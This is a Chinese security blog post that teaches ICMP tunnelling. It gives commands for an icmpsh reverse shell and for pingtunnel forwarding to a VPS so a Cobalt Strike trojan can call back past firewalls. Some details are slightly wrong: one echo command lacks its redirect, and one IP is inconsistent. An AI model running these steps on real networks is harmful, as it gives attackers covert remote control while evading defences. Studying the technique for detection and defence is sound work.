icmp隧道

免责声明

      文章所涉及内容，仅供安全研究教学使用，由于传播、利用本文所提供的信息而造成的任何直接或间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任

前言

      当域内主机对TCP以及UDP通信进行了出网的设置，这个时候就需要将TCP/UDP的数据封装到ICMP的ping数据包中，从而绕过防火墙的限制。常用icmpsh,icmptunnel,pingtunnel这三个工具实现icmp隧道穿透。

      当我们在域主机的防火墙策略上限制了TCP出网时，域内的主机tcp协议的数据都将不能出网，这个时候我们想上线域内主机就得使用到icmp隧道进行穿透。

一.icmpsh获取反弹shell

icmpsh是一个简单的反向ICMP shell，不需要管理员权限就能启动运行。我们获取到一台主机的权限后进行一个协议的出网测试当发现icmp能出网的时候我们便可以进行一个icmp的隧道搭建。

攻击机ip:192.168.1.11

被控主机ip1:192.168.1.99 

             ip2:192.168.8.9

1.先在攻击机上关闭icmp的应答

echo 1 /proc/sys/net/ipv4/icmp_echo_ignore_all

2.启动icmpsh_m来连接被控主机python2 icmpsh_m.py 192.168.1.11 192.168.1.9

3.在被控主机中上传并启动icmpsh.exe icmpsh.exe -t 192.168.1.11,将shell反弹到攻击机上

4.攻击机获取到当前的被控主机上的shell权限

二.pingtunnel搭建隧道

pingtunnl工具可以将tcp/udp/sock5流量夹带到icmp数据中进行转发，下面演示pingtunnl工具的使用

vps ip:23.94.*.*

靶机ip:192.168.1.7

1.vps上启动pingtunnel服务器端

./pingtunnel -type server

2.靶机上启动pingtunnel客户端

pingtunnel -type client -l 192.168.1.7:9999 -s 23.94.*.* -t 23.94.*.*:7777 -tcp 1 (将本地的9999端口转发到vps上的7777端口)

3.在cs上生成一个监听，将上线地址修改成本地以及上线端口改成本机的9999端口，并监听vps上的7777端口，并使用该监听生成木马

4.运行木马上线

5.使用wireshark查看23.94.*.*和192.168.1.7建立的连接

进wireshark使用语句ip.addr == 192.168.1.7 && ip.addr ==23.94.*.*,可以看到这里面的全是icmp数据包

原文始发于微信公众号（泾弦安全）：icmp隧道